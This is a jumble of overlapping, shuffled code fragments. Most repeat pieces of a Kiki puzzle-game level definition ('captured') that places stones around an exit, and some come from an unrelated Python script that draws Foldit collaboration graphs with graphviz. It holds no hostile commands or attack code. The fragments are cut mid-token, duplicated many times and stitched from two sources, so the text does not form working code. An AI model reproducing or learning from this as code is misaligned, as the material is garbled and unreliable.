\"name\": \"exit\", \"active\": 1, \"position\": (0,0,0), }, ], \"create\":", "\"scheme\": \"default_scheme\", \"size\": (9,9,9), \"intro\": \"captured\", \"help\": ( \"$scale(1.5)mission:\\nget to the exit!\\n\\n\" +", "(i, -1, -1), world.decenter(i, -1, 1)]) for i in [-4, -2, 2, 4]:", "4]: world.addObjectAtPos (KikiStone(), world.decenter(i, 0, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, i, 0)) world.addObjectAtPos (KikiStone(),", "), \"player\": { \"position\": (0,-3,0), }, \"exits\": [ { \"name\": \"exit\", \"active\": 1,", "2, 4]: world.addObjectAtPos (KikiStone(), world.decenter(i, 0, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, i, 0)) world.addObjectAtPos", "exit,\\nmove the stones\", ), \"player\": { \"position\": (0,-3,0), }, \"exits\": [ { \"name\":", "to the exit!\\n\\n\" + \\ \"to get to the exit,\\nmove the stones\", ),", "-1),\\ world.decenter (-1, i, -1), world.decenter(-1, i, 1)]) world.addObjectPoly (KikiStone, [world.decenter (i, 1,", "<reponame>triffid/kiki<gh_stars>1-10 # ................................................................................................................. # Level design of 'captured' by <NAME> # ................................................................................................................. 
level_dict[\"captured\"]", "1), world.decenter(i, 1, -1),\\ world.decenter (i, -1, -1), world.decenter(i, -1, 1)]) for i", "\"position\": (0,0,0), }, ], \"create\": \"\"\" s = world.getSize() for i in [-2,", "world.decenter (i, -1, -1), world.decenter(i, -1, 1)]) for i in [-4, -2, 2,", "1, \"position\": (0,0,0), }, ], \"create\": \"\"\" s = world.getSize() for i in", "(-1, i, -1), world.decenter(-1, i, 1)]) world.addObjectPoly (KikiStone, [world.decenter (i, 1, 1), world.decenter(i,", "world.decenter(1, -1, i), world.decenter (-1, -1, i), world.decenter(-1, 1, i)]) world.addObjectPoly (KikiStone, [world.decenter", "0, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, i, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, 0, i)) \"\"\",", "-1), world.decenter(-1, i, 1)]) world.addObjectPoly (KikiStone, [world.decenter (i, 1, 1), world.decenter(i, 1, -1),\\", "\"\"\" s = world.getSize() for i in [-2, 2]: world.addObjectPoly (KikiStone, [world.decenter (1,", "[world.decenter (i, 1, 1), world.decenter(i, 1, -1),\\ world.decenter (i, -1, -1), world.decenter(i, -1,", "\"exit\", \"active\": 1, \"position\": (0,0,0), }, ], \"create\": \"\"\" s = world.getSize() for", "1, -1),\\ world.decenter (i, -1, -1), world.decenter(i, -1, 1)]) for i in [-4,", "(0,0,0), }, ], \"create\": \"\"\" s = world.getSize() for i in [-2, 2]:", "'captured' by <NAME> # ................................................................................................................. 
level_dict[\"captured\"] = { \"scheme\": \"default_scheme\", \"size\": (9,9,9), \"intro\":", "exit!\\n\\n\" + \\ \"to get to the exit,\\nmove the stones\", ), \"player\": {", "i in [-4, -2, 2, 4]: world.addObjectAtPos (KikiStone(), world.decenter(i, 0, 0)) world.addObjectAtPos (KikiStone(),", "-1, 1)]) for i in [-4, -2, 2, 4]: world.addObjectAtPos (KikiStone(), world.decenter(i, 0,", "[-4, -2, 2, 4]: world.addObjectAtPos (KikiStone(), world.decenter(i, 0, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, i,", "(9,9,9), \"intro\": \"captured\", \"help\": ( \"$scale(1.5)mission:\\nget to the exit!\\n\\n\" + \\ \"to get", "\"player\": { \"position\": (0,-3,0), }, \"exits\": [ { \"name\": \"exit\", \"active\": 1, \"position\":", "for i in [-2, 2]: world.addObjectPoly (KikiStone, [world.decenter (1, 1, i), world.decenter(1, -1,", "world.addObjectAtPos (KikiStone(), world.decenter(i, 0, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, i, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0,", "1)]) for i in [-4, -2, 2, 4]: world.addObjectAtPos (KikiStone(), world.decenter(i, 0, 0))", "the exit!\\n\\n\" + \\ \"to get to the exit,\\nmove the stones\", ), \"player\":", "stones\", ), \"player\": { \"position\": (0,-3,0), }, \"exits\": [ { \"name\": \"exit\", \"active\":", "[world.decenter (1, i, 1), world.decenter(1, i, -1),\\ world.decenter (-1, i, -1), world.decenter(-1, i,", "{ \"position\": (0,-3,0), }, \"exits\": [ { \"name\": \"exit\", \"active\": 1, \"position\": (0,0,0),", "# ................................................................................................................. 
level_dict[\"captured\"] = { \"scheme\": \"default_scheme\", \"size\": (9,9,9), \"intro\": \"captured\", \"help\": (", "(0,-3,0), }, \"exits\": [ { \"name\": \"exit\", \"active\": 1, \"position\": (0,0,0), }, ],", "i), world.decenter(-1, 1, i)]) world.addObjectPoly (KikiStone, [world.decenter (1, i, 1), world.decenter(1, i, -1),\\", "Level design of 'captured' by <NAME> # ................................................................................................................. level_dict[\"captured\"] = { \"scheme\": \"default_scheme\",", "], \"create\": \"\"\" s = world.getSize() for i in [-2, 2]: world.addObjectPoly (KikiStone,", "world.decenter(i, 1, -1),\\ world.decenter (i, -1, -1), world.decenter(i, -1, 1)]) for i in", "1)]) world.addObjectPoly (KikiStone, [world.decenter (i, 1, 1), world.decenter(i, 1, -1),\\ world.decenter (i, -1,", "\"$scale(1.5)mission:\\nget to the exit!\\n\\n\" + \\ \"to get to the exit,\\nmove the stones\",", "(KikiStone, [world.decenter (i, 1, 1), world.decenter(i, 1, -1),\\ world.decenter (i, -1, -1), world.decenter(i,", "# Level design of 'captured' by <NAME> # ................................................................................................................. 
level_dict[\"captured\"] = { \"scheme\":", "\"to get to the exit,\\nmove the stones\", ), \"player\": { \"position\": (0,-3,0), },", "world.decenter(i, 0, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, i, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, 0, i))", "world.decenter(i, -1, 1)]) for i in [-4, -2, 2, 4]: world.addObjectAtPos (KikiStone(), world.decenter(i,", "}, ], \"create\": \"\"\" s = world.getSize() for i in [-2, 2]: world.addObjectPoly", "world.addObjectPoly (KikiStone, [world.decenter (1, 1, i), world.decenter(1, -1, i), world.decenter (-1, -1, i),", "world.addObjectPoly (KikiStone, [world.decenter (i, 1, 1), world.decenter(i, 1, -1),\\ world.decenter (i, -1, -1),", "by <NAME> # ................................................................................................................. level_dict[\"captured\"] = { \"scheme\": \"default_scheme\", \"size\": (9,9,9), \"intro\": \"captured\",", "\"size\": (9,9,9), \"intro\": \"captured\", \"help\": ( \"$scale(1.5)mission:\\nget to the exit!\\n\\n\" + \\ \"to", "-2, 2, 4]: world.addObjectAtPos (KikiStone(), world.decenter(i, 0, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, i, 0))", "2]: world.addObjectPoly (KikiStone, [world.decenter (1, 1, i), world.decenter(1, -1, i), world.decenter (-1, -1,", "in [-4, -2, 2, 4]: world.addObjectAtPos (KikiStone(), world.decenter(i, 0, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0,", "-1), world.decenter(i, -1, 1)]) for i in [-4, -2, 2, 4]: world.addObjectAtPos (KikiStone(),", "to the exit,\\nmove the stones\", ), \"player\": { \"position\": (0,-3,0), }, \"exits\": [", "i), world.decenter (-1, -1, i), world.decenter(-1, 1, i)]) world.addObjectPoly (KikiStone, [world.decenter (1, i,", "\"active\": 1, \"position\": (0,0,0), }, ], \"create\": \"\"\" s = world.getSize() for i", "\"default_scheme\", \"size\": (9,9,9), \"intro\": \"captured\", \"help\": ( \"$scale(1.5)mission:\\nget to the exit!\\n\\n\" + \\", "world.decenter(-1, i, 
1)]) world.addObjectPoly (KikiStone, [world.decenter (i, 1, 1), world.decenter(i, 1, -1),\\ world.decenter", "1, i), world.decenter(1, -1, i), world.decenter (-1, -1, i), world.decenter(-1, 1, i)]) world.addObjectPoly", "world.decenter (-1, -1, i), world.decenter(-1, 1, i)]) world.addObjectPoly (KikiStone, [world.decenter (1, i, 1),", "(1, 1, i), world.decenter(1, -1, i), world.decenter (-1, -1, i), world.decenter(-1, 1, i)])", "-1, i), world.decenter(-1, 1, i)]) world.addObjectPoly (KikiStone, [world.decenter (1, i, 1), world.decenter(1, i,", "world.decenter(-1, 1, i)]) world.addObjectPoly (KikiStone, [world.decenter (1, i, 1), world.decenter(1, i, -1),\\ world.decenter", "0)) world.addObjectAtPos (KikiStone(), world.decenter(0, i, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, 0, i)) \"\"\", }", "-1, i), world.decenter (-1, -1, i), world.decenter(-1, 1, i)]) world.addObjectPoly (KikiStone, [world.decenter (1,", "\"position\": (0,-3,0), }, \"exits\": [ { \"name\": \"exit\", \"active\": 1, \"position\": (0,0,0), },", "i, 1), world.decenter(1, i, -1),\\ world.decenter (-1, i, -1), world.decenter(-1, i, 1)]) world.addObjectPoly", "................................................................................................................. # Level design of 'captured' by <NAME> # ................................................................................................................. level_dict[\"captured\"] = {", "-1, -1), world.decenter(i, -1, 1)]) for i in [-4, -2, 2, 4]: world.addObjectAtPos", "world.addObjectPoly (KikiStone, [world.decenter (1, i, 1), world.decenter(1, i, -1),\\ world.decenter (-1, i, -1),", "\"create\": \"\"\" s = world.getSize() for i in [-2, 2]: world.addObjectPoly (KikiStone, [world.decenter", "................................................................................................................. 
level_dict[\"captured\"] = { \"scheme\": \"default_scheme\", \"size\": (9,9,9), \"intro\": \"captured\", \"help\": ( \"$scale(1.5)mission:\\nget" ]
[ "def render_collab(data): user_colors = {} for pid in data.pid.unique(): print(pid) df = data[data.pid", "1, c) for c in cur.children]) if __name__ == '__main__': parser = argparse.ArgumentParser(prog='collab_viz.py')", "print(\" \"*ntab, cur.tag) # front.extend([(ntab + 1, c) for c in cur.children]) if", "logging.debug(\"getting team structures for {}\".format(pid)) df = data[data.pid == pid] pdb_infos = df.apply(lambda", "in root.energy_components}, tag, None, None, []) collab.children.extend(get_collab_children(tag, collab, evolves_by_source)) collabs[pid].append(collab) return collabs #", "# edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (p.timestamp - start) / (end", "team structures for {}\".format(pid)) df = data[data.pid == pid] pdb_infos = df.apply(lambda r:", "best = min(pdbs, key=lambda p: p.energy) child = Collaborator(uid, collab.gid, pdbs, {c.name: c.energy", "for x in d if x.scoretype == '2' and x.pdl[-1]['actions']]), [])) uid_grouped =", "roots = sum(([p for p in pdbs if p.scoretype == '1' and get_tag(p)", "pd import numpy as np import matplotlib.pyplot as plt from graphviz import Digraph", "[]) collab.children.extend(get_collab_children(tag, collab, evolves_by_source)) collabs[pid].append(collab) return collabs # for collab in sorted(collabs['2003642'], key=lambda", "x.pdl[-1]['actions']]), [])) uid_grouped = groupby(sorted(active_evolves, key=lambda e: euid_lookup[e.sid]), lambda e: euid_lookup[e.sid]) # group", "key=lambda e: e.uid), lambda e: e.uid) # uid_source_grouped = { # uid: {k:", "g in uid_grouped} # further group by source active_uids = list(uid_source_grouped.keys()) # evolver_clusters", "uid: {k: min(g, key=lambda p: p.energy) for k, g in # groupby(sorted(g, key=lambda", "r.evol_target_lines for p in l.pdb_infos] if r.evol_lines else []), key=lambda p: p.timestamp), axis=1)", "uid in df.uid} euid_lookup = {pdb.sid: get_evolver_uid(pdb, evol_lines_lookup[pdb.uid]) for pdb in sum(pdb_infos.values, [])}", "* c.weight for c in 
best.energy_components}, ShareTag(uid, round(best.energy, 4)), collab, root_tag, []) children.append(child)", "in line.pdb_infos] if s.sid in sids: return s.uid + \"evol\" + str(i) raise", "df.timestamps.apply(min).min() end = df.timestamps.apply(max).max() pdb_infos = df.apply(lambda r: sorted(([p for l in r.lines", "# uid_grouped = groupby(sorted(passive_evolves, key=lambda e: e.uid), lambda e: e.uid) # uid_source_grouped =", "enumerate(lines): sids = [p.sid for p in line.pdb_infos] if s.sid in sids: return", "prev_uid in new_uids: new_uids.remove(prev_uid) cdict[gid][prev_uid] = color assert len(colors) >= len(new_uids) for uid,", "for uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda d: [x for x in d if", "x in d if int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1]['actions']", "0.1 + 0.9 * (p.timestamp - start) / (end - start), 0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid,", "for uid in df.uid} euid_lookup = {pdb.sid: get_evolver_uid(pdb, evol_lines_lookup[pdb.uid]) for pdb in sum(pdb_infos.values,", "[]) + ([p for l in r.evol_target_lines for p in l.pdb_infos] if r.evol_lines", "list(plt.get_cmap('tab20b').colors)] new_uids = uids[:] for prev_uid, color in group_colors.items(): colors.remove(color) if prev_uid in", "collab.children.extend(get_collab_children(tag, collab, evolves_by_source)) collabs[pid].append(collab) return collabs # for collab in sorted(collabs['2003642'], key=lambda c:", "if r.evol_lines else []), key=lambda p: p.timestamp), axis=1) shared = {uid: list(pdbs) for", "sids = [p.sid for p in line.pdb_infos] if s.sid in sids: return s.uid", "key=lambda c: c.pdbs[0].gid): # print(collab.pdbs[0].gid) # print(collab.tag) # front = [(1, c) for", "for gid, c in zip(gids, cm.colors): # cdict[gid] = col_to_str(c) groups_uids = {gid:", ">= len(new_uids) for uid, c in zip(new_uids, colors): cdict[gid][uid] = c group_colors[uid] =", "i = 0 while cands[i]['header']['score'] == 9999.99 or cands[i]['actions'] == {} or 
cands[i]['header']['uid']", "in evolves_by_source.items()} collabs[pid] = [] for root in roots: tag = get_tag(root) sids", "evolves))) # evoling_start = min(e.timestamp for e in evolves) # edge_color = colorsys.hsv_to_rgb(0.28,", "[], {c.name: c.energy * c.weight for c in root.energy_components}, tag, None, None, [])", "NamedTuple, Tuple, List, Dict import matplotlib matplotlib.use(\"Agg\") def get_source(e): cands = e.pdl[-2::-1] i", "if __name__ == '__main__': parser = argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\", action='store_true') parser.add_argument('pids', nargs='+') args =", "c in zip(gids, cm.colors): # cdict[gid] = col_to_str(c) groups_uids = {gid: [uid for", "uid_source_grouped.items(): # gid = list(evolved_targets.values())[0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) # for target, evolve", "sorted(set(sum(pdb_infos.map(lambda d: [(x.gid, x.uid) for x in d if int(x.sharing_gid) > 1 or", "import ProcessPoolExecutor from foldit.foldit_data import get_relevant_sids from util import PDB_Info, get_data_value from typing", "class Collaborator(NamedTuple): uid: str gid: str pdbs: List[PDB_Info] energy_comps: Dict[str, float] tag: ShareTag", "| dot | gvpack -array_c{} | neato -Tpng -n2 -o {}.png\".format(outname, len(groups_uids)+1, outname),", "df.timestamps.apply(max).max() pdb_infos = df.apply(lambda r: sorted(([p for l in r.lines for p in", "collab.children] # while len(front) > 0: # ntab, cur = front.pop() # print(\"", "in group_clusters.values(): dot.subgraph(cluster) # output raw source, then use command line graphviz tools", "print(pid) df = data[data.pid == pid] start = df.timestamps.apply(min).min() end = df.timestamps.apply(max).max() pdb_infos", "# print(collab.pdbs[0].gid) # print(collab.tag) # front = [(1, c) for c in collab.children]", "s.uid for i, line in enumerate(lines): sids = [p.sid for p in line.pdb_infos]", "x.pdl[-1]['actions'] == {}]), [])) # map gids to colors cdict = {} 
#", "& edges uid_grouped = groupby(sorted(active_evolves, key=lambda e: e.uid), lambda e: e.uid) # group", "in data.pid.unique(): logging.debug(\"getting team structures for {}\".format(pid)) df = data[data.pid == pid] pdb_infos", "in groupby(sorted(active_evolves, key=lambda s: get_source_tag(s)), lambda s: get_source_tag(s))} evolves_by_source = {tag: {uid: list(pdbs)", "get_data_value(uid, pid, \"evol_target_lines\", df) for uid in df.uid} euid_lookup = {pdb.sid: get_evolver_uid(pdb, evol_lines_lookup[pdb.uid])", "in d if int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1]['actions'] ==", "Digraph(name=\"parent\", graph_attr={'forecelabels': 'true', 'K': '0.6', 'repulsiveforce': '2'}, node_attr={'style': 'filled'}, edge_attr={'color': '#00000055'}) group_clusters =", "in groups_uids.items(): cdict[gid] = {} group_colors = user_colors.setdefault(gid, {}) colors = [col_to_str(c) for", "pdb in sum(pdb_infos.values, [])} shared = {uid: list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map(", "round(source['header']['score'], 4)) def get_evolver_uid(s: PDB_Info, lines: list) -> str: if s.scoretype == \"1\":", "(int(col[0] * 0xff), int(col[1] * 0xff), int(col[2] * 0xff))) def is_corrupted(pdl, uid): return", "end = df.timestamps.apply(max).max() pdb_infos = df.apply(lambda r: sorted(([p for l in r.lines for", "[])) passive_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if int(x.sharing_gid)", "{pdb.sid: get_evolver_uid(pdb, evol_lines_lookup[pdb.uid]) for pdb in sum(pdb_infos.values, [])} shared = {uid: list(pdbs) for", "active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if int(x.sharing_gid) ==", "= Collaborator(uid, collab.gid, pdbs, {c.name: c.energy * c.weight for c in best.energy_components}, ShareTag(uid,", "[uid for _, uid in g] for gid, g in groupby( sorted(set(sum(pdb_infos.map(lambda d:", "loaded in a shared solution but didn't do anything # uid_grouped = groupby(sorted(passive_evolves,", "for 
p in pdbs: if \"{}@{:.2f}\".format(uid, p.energy) in evolved: shape = \"box\" if", "= c group_colors[uid] = c dot = Digraph(name=\"parent\", graph_attr={'forecelabels': 'true', 'K': '0.6', 'repulsiveforce':", "key=lambda e: euid_lookup[e.sid]), lambda e: euid_lookup[e.sid]) # group by evolver uid_source_grouped = {", "= min(pdbs, key=lambda p: p.energy) child = Collaborator(uid, collab.gid, pdbs, {c.name: c.energy *", "print(collab.pdbs[0].gid) # print(collab.tag) # front = [(1, c) for c in collab.children] #", "e.uid), lambda e: e.uid) # uid_source_grouped = { # uid: {k: min(g, key=lambda", "from foldit.foldit_data import get_relevant_sids from util import PDB_Info, get_data_value from typing import NamedTuple,", "groupby(sorted(sum(pdb_infos.map( lambda d: [x for x in d if int(x.sharing_gid) > 1]), []),", "data.pid.unique(): logging.debug(\"getting team structures for {}\".format(pid)) df = data[data.pid == pid] pdb_infos =", "penwidth=str(0.2 + np.log10(len(evolves))), style=\"dashed\" if min(e.energy for e in evolves) >= target[1] else", "0 while cands[i]['header']['score'] == 9999.99 or cands[i]['actions'] == {} or cands[i]['header']['uid'] == e.uid:", "col_to_str(col): return '#' + (\"%0.2X%0.2X%0.2X\" % (int(col[0] * 0xff), int(col[1] * 0xff), int(col[2]", "True for uid, pdbs in shared.items(): gid = pdbs[0].gid num_ignored = len([p for", "else 'tab20') # for gid, c in zip(gids, cm.colors): # cdict[gid] = col_to_str(c)", "label=\"{:.2f}\".format(p.energy), shape=shape, style='filled,solid' if evolved[\"{}@{:.2f}\".format(uid, p.energy)] else 'filled,dashed', fillcolor=cdict[gid][uid]) # color=\"#ffffff\") for cluster", "argparse import os import csv import json import logging from itertools import groupby", "{} for pid in data.pid.unique(): print(pid) df = data[data.pid == pid] start =", "p in l.pdb_infos] if r.evol_lines else []), key=lambda p: p.timestamp), axis=1) evol_lines_lookup =", "for c in cur.children]) if __name__ == '__main__': parser = 
argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\", action='store_true')", "dot.subgraph(sg) # do it again, this time for people who just loaded in", "if s.sid in sids: return s.uid + \"evol\" + str(i) raise ValueError(\"evolver pdb", "colors): cdict[gid][uid] = c group_colors[uid] = c dot = Digraph(name=\"parent\", graph_attr={'forecelabels': 'true', 'K':", "list(evolved_targets.values())[0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) # for target, evolve in evolved_targets.items(): # dot.edge(uid,", "pdl) def remove_corrupted(pdb_infos): return [x for x in pdb_infos if not is_corrupted(x.pdl, x.uid)]", "== e.uid: i += 1 return cands[i] def col_to_str(col): return '#' + (\"%0.2X%0.2X%0.2X\"", "# for uid, evolved_targets in uid_source_grouped.items(): # gid = list(evolved_targets.values())[0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid],", "# gid = list(evolved_targets.values())[0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) # for target, evolve in", "'#00000055'}) group_clusters = {gid: Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label': \"group_{}\".format(gid)}) for gid in groups_uids} evolved =", "in groupby(sorted(xs, key=lambda x: euid_lookup[x.sid]), lambda x: euid_lookup[x.sid])} for tag, xs in evolves_by_source.items()}", "collabs[pid].append(collab) return collabs # for collab in sorted(collabs['2003642'], key=lambda c: c.pdbs[0].gid): # print(collab.pdbs[0].gid)", "PDB_Info) -> ShareTag: return ShareTag(s.uid, round(s.energy, 4)) def get_source_tag(s: PDB_Info) -> ShareTag: source", "as pd import numpy as np import matplotlib.pyplot as plt from graphviz import", "c in collab.children] # while len(front) > 0: # ntab, cur = front.pop()", "g in # uid_grouped if uid not in active_uids} # screen out anyone", "x.pdl[-1]['actions']]), [])) passive_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if", 
"evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])] = True for uid, pdbs in shared.items(): gid = pdbs[0].gid num_ignored", "color assert len(colors) >= len(new_uids) for uid, c in zip(new_uids, colors): cdict[gid][uid] =", "for e in evolves) >= target[1] else \"solid\") evolved[\"{}@{:.2f}\".format(*target)] = True # for", "for x in d if int(x.sharing_gid) > 1]), []), key=lambda p: euid_lookup[p.sid]), lambda", "p in line.pdb_infos] if s.sid in sids: return s.uid + \"evol\" + str(i)", "if s.scoretype == \"1\": return s.uid for i, line in enumerate(lines): sids =", "uid, pdbs in evolves_by_source[root_tag].items(): best = min(pdbs, key=lambda p: p.energy) child = Collaborator(uid,", "return all(p['actions'] == {} or p['header']['uid'] == uid or p['header']['uid'] == '0' or", "cdict[gid][prev_uid] = color assert len(colors) >= len(new_uids) for uid, c in zip(new_uids, colors):", "dot.edge(uid, \"{}@{:.2f}\".format(*target), penwidth='3', style='dashed') # evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values():", "# for collab in sorted(collabs['2003642'], key=lambda c: c.pdbs[0].gid): # print(collab.pdbs[0].gid) # print(collab.tag) #", "for k, g in groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))}", "get_relevant_sids from util import PDB_Info, get_data_value from typing import NamedTuple, Tuple, List, Dict", "colors = [col_to_str(c) for c in list(plt.get_cmap('tab20').colors) + list(plt.get_cmap('tab20b').colors)] new_uids = uids[:] for", "shared.items(): gid = pdbs[0].gid num_ignored = len([p for p in pdbs if \"{}@{:.2f}\".format(uid,", "in groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g", "matplotlib.use(\"Agg\") def get_source(e): 
cands = e.pdl[-2::-1] i = 0 while cands[i]['header']['score'] == 9999.99", "in zip(new_uids, colors): cdict[gid][uid] = c group_colors[uid] = c dot = Digraph(name=\"parent\", graph_attr={'forecelabels':", "\"group_{}\".format(gid)}) for gid in groups_uids} evolved = {} # create evolver nodes &", "active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if x.scoretype ==", "get_tag(pdb) in evolves_by_source and int(pdb.sharing_gid) > 1: child.children.extend(get_collab_children(get_tag(pdb), child, evolves_by_source)) return children def", "key=lambda e: e.uid), lambda e: e.uid) # group by evolver uid_source_grouped = {", "for tag, pdbs in groupby(sorted(active_evolves, key=lambda s: get_source_tag(s)), lambda s: get_source_tag(s))} evolves_by_source =", "[col_to_str(c) for c in list(plt.get_cmap('tab20').colors) + list(plt.get_cmap('tab20b').colors)] new_uids = uids[:] for prev_uid, color", "g in # groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), # lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))}", "dot.subgraph(name=\"cluster_{}\".format(uid), # graph_attr={'label': \"{}_shared ({} ignored)\".format(uid, num_ignored), 'forcelabels': 'true', # 'style': 'filled', 'fillcolor':", "evolver_clusters = {gid: Digraph(name=\"cluster_passive_ evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_passive_evolvers'.format(gid)}) # for", "9999.99 or cands[i]['actions'] == {} or cands[i]['header']['uid'] == e.uid: i += 1 return", "p in l.pdb_infos] if r.evol_lines else []), key=lambda p: p.timestamp), axis=1) shared =", "import json import logging from itertools import groupby import pandas as pd import", "child_lookup): collabs = {} for pid in data.pid.unique(): logging.debug(\"getting team structures for {}\".format(pid))", "in pdb_infos if not is_corrupted(x.pdl, x.uid)] def render_collab(data): user_colors = {} for pid", "root_tag, []) 
children.append(child) for pdb in pdbs: if get_tag(pdb) in evolves_by_source and int(pdb.sharing_gid)", "d if int(x.sharing_gid) > 1]), []), key=lambda p: euid_lookup[p.sid]), lambda p: euid_lookup[p.sid])} active_evolves", "d if int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1]['actions']]), [])) passive_evolves", "if p.scoretype == '1' or is_corrupted(p.pdl, p.uid) else \"diamond\" # c.node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy),", "collabs # for collab in sorted(collabs['2003642'], key=lambda c: c.pdbs[0].gid): # print(collab.pdbs[0].gid) # print(collab.tag)", "# uid_source_grouped = { # uid: {k: min(g, key=lambda p: p.energy) for k,", "'style': 'filled', 'fillcolor': cdict[pdbs[0].gid]}, # node_attr={'style': 'filled'}) as c: for p in pdbs:", "\"evol_target_lines\", df) for uid in df.uid} euid_lookup = {pdb.sid: get_evolver_uid(pdb, evol_lines_lookup[pdb.uid]) for pdb", "{target for targets in uid_source_grouped.values() for target in targets} roots = sum(([p for", "(int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1][ 'actions'])]), []))), lambda p:", "dot | gvpack -array_c{} | neato -Tpng -n2 -o {}.png\".format(outname, len(groups_uids)+1, outname), shell=True,", "sorted(([p for l in r.lines for p in l.pdb_infos] if r.lines else [])", "in evolved_targets] for pdbs in shared.values()), []) evolves_by_source = {tag: list(pdbs) for tag,", "print(collab.tag) # front = [(1, c) for c in collab.children] # while len(front)", "'#' + (\"%0.2X%0.2X%0.2X\" % (int(col[0] * 0xff), int(col[1] * 0xff), int(col[2] * 0xff)))", "def get_source_tag(s: PDB_Info) -> ShareTag: source = get_source(s) return ShareTag(source['header']['uid'], round(source['header']['score'], 4)) def", "key=lambda p: euid_lookup[p.sid]), lambda p: euid_lookup[p.sid])} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for", "\"diamond\" # c.node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, 
group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, style='filled,solid' if evolved[\"{}@{:.2f}\".format(uid,", "= 0 while cands[i]['header']['score'] == 9999.99 or cands[i]['actions'] == {} or cands[i]['header']['uid'] ==", "import subprocess import argparse import os import csv import json import logging from", "import os import csv import json import logging from itertools import groupby import", "lambda e: e.uid) # group by evolver uid_source_grouped = { uid: {k: list(g)", "or (int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1][ 'actions'])]), []))), lambda", "Collaborator(NamedTuple): uid: str gid: str pdbs: List[PDB_Info] energy_comps: Dict[str, float] tag: ShareTag parent:", "{} # create evolver nodes & edges uid_grouped = groupby(sorted(active_evolves, key=lambda e: e.uid),", "key=lambda e: get_source_tag(e)), lambda e: get_source_tag(e))} for uid, g in uid_grouped} # further", "(get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in uid_grouped} # further group by source active_uids", "# for sg in evolver_clusters.values(): # dot.subgraph(sg) # nodes and edges for shared", "return '#' + (\"%0.2X%0.2X%0.2X\" % (int(col[0] * 0xff), int(col[1] * 0xff), int(col[2] *", "colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (evoling_start - start) / (end - start), 0.7)", "penwidth='3', style='dashed') # evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values(): # dot.subgraph(sg)", "for {}\".format(s.sid, (s.uid, s.pid))) def get_collab_children(root_tag: ShareTag, collab: Collaborator, evolves_by_source: dict) -> List[Collaborator]:", "{uid: list(pdbs) for uid, pdbs in groupby(sorted(xs, key=lambda x: euid_lookup[x.sid]), lambda x: euid_lookup[x.sid])}", "energy_comps: Dict[str, float] tag: ShareTag parent: \"Collaborator\" source: ShareTag children: List[\"Collaborator\"] def get_tag(s:", "import pandas as pd import numpy as np import matplotlib.pyplot as 
plt from", "import logging from itertools import groupby import pandas as pd import numpy as", "remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if int(x.sharing_gid) == 0 and", "data[data.pid == pid] pdb_infos = df.apply(lambda r: sorted(([p for l in r.lines for", "[x for x in pdb_infos if not is_corrupted(x.pdl, x.uid)] def render_collab(data): user_colors =", "in sids] if sids else [], {c.name: c.energy * c.weight for c in", "uid, pdbs in groupby(sorted(xs, key=lambda x: euid_lookup[x.sid]), lambda x: euid_lookup[x.sid])} for tag, xs", "\"{}@{:.2f}\".format(*target), penwidth='3', style='dashed') # evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values(): #", "evolves_by_source[root_tag].items(): best = min(pdbs, key=lambda p: p.energy) child = Collaborator(uid, collab.gid, pdbs, {c.name:", "# graph_attr={'label': '{}_passive_evolvers'.format(gid)}) # for gid in gids} # for uid, evolved_targets in", "get_source_tag(e))} for uid, g in uid_grouped} # further group by source evolved_targets =", "for gid in gids} # for uid, evolved_targets in uid_source_grouped.items(): # gid =", "gid = list(evolved_targets.values())[0][0].gid # evolver_clusters[gid].node(uid, 